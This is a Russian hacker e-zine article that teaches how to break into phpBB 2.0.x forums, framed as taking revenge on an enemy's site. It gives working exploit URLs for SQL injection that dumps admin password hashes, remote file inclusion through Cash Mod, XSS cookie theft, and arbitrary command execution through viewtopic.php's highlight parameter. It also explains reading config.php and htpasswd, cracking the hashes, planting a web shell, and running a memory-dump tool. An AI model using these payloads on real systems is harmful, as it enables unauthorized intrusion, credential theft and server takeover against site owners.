phpBB или что дает нам дырявый форум

                                                                           
                 #                          #  #           
 ######### #    #  ######### #########      #  #       #   
 #       #  #  #   #       # #       #    ########   ###   
 #           ##    #         #              #  #       #   
 #######     ##    #######   #              #  #       #   
 #       #  #  #   #       # #       #    ########     #   
 ######### #    #  ######### #########      #  #    #######
                                            #  #           
                                             

---== [EXEC] electronic magazine about hack sercurity coding & ru hack scene ==---

# phpBB или что дает нам дырявый форум.

Здарова, юный взломщик (если ты не юный, то тебе уже не стоит заниматься
тем, что описано ниже ;) Сразу скажу,что весь материл, который дан в ЭТОЙ
статье - НЕ новый и НЕ оригинальный, так чтоесли тебе неинтересно ломать
форумы пхпББ и получать от этого максимальную выгоду (да, пароль админа
- это далеко не наибольшая выгода отполоманного форума), то тебе нечего
читать дальше=).

Ладно, теперь ближе к телу. Допустим, у тебя есть враг/недруг/друг, короче
тот, кто тебе чем-то насолил,и теперь необходимо расплатится с ним таким же
ЗЛОМ. И так, ты уже решил, что путем расплаты станет наш любимый интернет
(блин, какой пафос!). Лезем на сайт недруга и видим - у него там форум
работает на движке phpBB 2.0.* (phpBB ветки =2 разбирать не буду по вполне
понятным причинам). Пока основным путем построенияЗЛА для нас будет именно
форум, так как.... Да чё объяснять то? И так понятновсё. Теперь надо, чтобы
в голове сложился план возможных зол, которые мы можем сделать:

1. SQL-инъекция
2. Юзание баги пхп-инклуд
3. ЧЫЫ-атака (сорри, XSS - атака)
4. Вход-> с правами nobody
5. Дамп куска памяти (вот это ново!)
6. Остальные баги - полная чушь... Просто писать лень=)

Ничего, что не по возрастанию опасности расположил?
Теперь по обо всём по порядку... Первое. Что надо сделать в любом случае -
узнать версию форума.Теперь подходимк самому интересному, непосредственно
юзанию уязвимостей.

1. СКУЛ-инжекшн - дает нам пароль любого зарегистрированного
пользователя форума (админ тоже считается зарегистрированным пользователем)
. Вот сами коды эксплойтов для нескольких версий форумов:

*************************Версия 2.0.6 и ниже****************************

http://путь_к_форуму/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=
AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20username,null,user_password,null
,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null FROM phpbb_users 
WHERE user_level=1 LIMIT 1/* 

/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND pm.privmsgs_type=
-99 UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,
0,0,0,0,user_password FROM phpbb_users WHERE user_id=2 LIMIT 1/*

***************************Всё ещё 2.0.6********************************

Выпущен так же сплойт на пхп, который юзает sql-inj багу в сценарии search.php,
в котором переменная $search_results не проверяется на корректность входных 
данных при не установленных значениях переменной $show_results. Собственно, 
по этому случаю человек с ником pokleyzz написал эксплойт (текст сплойта 
находится в папке phpbb_bugz в файле phpbb2.0.6fetch_password_hash.txt 
(тоже любишь длинные имена файлов???)) - для его правильной работы нужна 
библиотека cURL. Про инъекции в 2.0.6 вроде всё.

********************Версия 2.0.8*************************
Бага кроется в сценарии privmsg.php (как, впрочем и в 2.0.6 версии). Вот код:

http://путь_к_форуму/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=
AND pm.privmsgs_type=-99 UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
username,0,0,0,0,0,0,0,0,0,user_password FROM phpbb_users WHERE user_id=2 LIMIT 1/*

********************************вроде с инъекциями всё*********************

2. PHP-include bug
Тут у нас немного места для веселья, потому что инклудинг будет возможен, если
форум работает с модулем Cash Mod 2.2.1.Лично я мало таких форумов встречал,
но они есть! Вот, что надо писать в адресную строку:

Http://путь_к _форуму/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://file/

Я полагаю, не надо объяснять, какое содержание должно быть у файла, на 
который указывает переменная phpbb_root_path ...

***********************инклуд на этом заканчивается************************

3. XSS-attack
Да, конечно, врят ли админ форума пойдет по ссылке, которую ему прислал Петя их
Нижнеурюпинска,правда, когда админ видит ссылку, ведущую КУДА-ТО, но в пределах
ЕГО сайта. Может он ещё и купится на это... Тогда жди заветные хэши (если, 
конечно, у тебя настроен небольшой скрипт, который принимает данные и шлёт тебе по
почте или пишет их в лог-файл). Вот как надо использовать эту уязвимость:

http://путь_у_форуму/search.php?search_author='script>alert(document.cookie)/script>
- эта бага работает во всех версиях форума.

В принципе, таких примеров XSS-баг в пхпББ много. Этот, по моему, самый распространённый.
***************************всё про XSS***************************************

4. Выполнение произвольных команд с правами nobody
Эта бага, к нашей радости, работает во всех версиях phpBB до 2.0.11, 
поэтому в нете ещё долго будут висеть сайты, на которых в два счёта можно будет
установить www-шелл.Теперь подошли к самому интересному. По поводу этой уязвимости
и так уже очень много сказано и написано.С её помощью можно вывести контент 
config.php и в открытом виде увидеть пасс и логин к БД (скорее всего он подойдет 
и к админской форума, 6-тизначной аське админа, его почте, а если тебе очень повезёт,
то и к FTP, SSH или даже TELNET шеллу!!! Такого, конечно, не будет, хотя всякое 
бывает=), просмотреть что-нибудь типа htpasswd и получить заветные пароли 
(в последствии htpasswd можно скормить John The Ripper'у), в конце концов залить 
на сервак скрипт удаленного управления типа cgi-telnet'a.

Вот он, супер эксплойт, главный инструмент скрипт-киддисов по всему миру:

http://путь_к_форуму/viewtopic.php?p=real_topic_number&highlight
=%2527.$poster=%60$cmd%60.%2527&cmd=id 

Для полных прищепок и прапоров говорю, вместо "id" можно ставить любую команду.
***********************************скоро конец**********************************

5. Дамп чувствительной памяти
И вот теперь самое свежее и тепленькое. Найдена новая бага в PHP unserializer
во всех версиях PHPbb2 форума, естественно, быстро нашлись люди (жаль только,
что ими оказались французы), написавшие сплойт на Си, который делает дамп 
чувствительной памяти. Программа делает дамп из БД и записывает инфу в 
указанный файл. Самое козырное то, что мы пару раз вырубали серваки ващще,
хотя делать этого не намеревались=). Готовый бинарник лежит в архиве
phpbbmemorydumper.rar в папке php_bugz. Синтаксис использования примерно такой:

phpbbmemorydumper.exe "http://путь_к_форуму/" число(размер дампа) repeat > 
имя_файла_у_тебя_на_компе.txt

Кавычки должны быть обязательно, в конце ссылки должен быть слэш! 
*********************вот вроде и всё**************************************

Кажется, всё. Надеюсь, этой статьей я хоть чем-то помог тебе. А вообще помни
- phpbb - полное решето,
если забивать на все баг-траки и не патчить дыры. 

Author: SRG (#icq: 9572688)

+ Содержание +